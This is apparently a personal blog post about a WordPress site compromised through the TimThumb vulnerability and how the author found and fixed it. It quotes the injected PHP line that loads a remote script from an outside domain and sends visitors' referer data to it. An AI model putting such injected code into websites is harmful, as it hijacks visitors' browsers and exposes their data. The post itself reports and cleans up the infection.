As I read through my tech news a few weeks ago I took note of a TimThumb vulnerability that allowed bad people to do bad things to your website.  Recommended solution was to replace TimThumb.php with the latest version available online.  A lot of WordPress themes use TimThumb to auto resize images for front pages and the like.  Shortly thereafter I received an email from Elegant Themes advising to update all their themes to the latest version which now did not employ TimThumb, then make sure TimThumb.php and it’s cache folder were deleted.  I made a not to get those things done.

Unfortunately one of the sites I look after had already been affected, so when I went through the upgrade procedures everything seemed fine but I had a popunder ad the next day.  Some Google searches didn’t reveal much so I needed more information.  I checked the page source in my browser and noticed this line at the bottom outside the HTML tag:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain2.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

A Google search brought me to TECHspheria and their excellent removal instructions.  Changing all your passwords after something like this is a great idea as well.  Scary business.